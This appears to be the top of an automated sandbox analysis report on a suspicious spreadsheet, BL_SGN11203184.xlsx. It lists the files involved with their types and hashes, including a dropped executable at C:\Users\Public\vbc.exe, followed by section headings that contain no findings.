C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D467075B.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEDF5C96.png	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced	4141C7515CE64FED13BE6D2BA33299AA	B290F533537A734B7030CE1269AC8C5398754194	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77229A3.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	955A9E08DFD3A0E31C7BCF66F9519FFC	F677467423105ACF39B76CB366F08152527052B3	08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
C:\Users\user\Desktop\~$BL_SGN11203184.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	99BBF83ABE9D6E4ECC91493E32230833	B0BD6BA2DC10EB5552EDC7A3460C80EE0EB1B11E	2B2A00650DC91D1A7CCFA4A62E3462762C62D8A092BDDB75943F87074F1D56A5

Analysis Report BL_SGN11203184.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs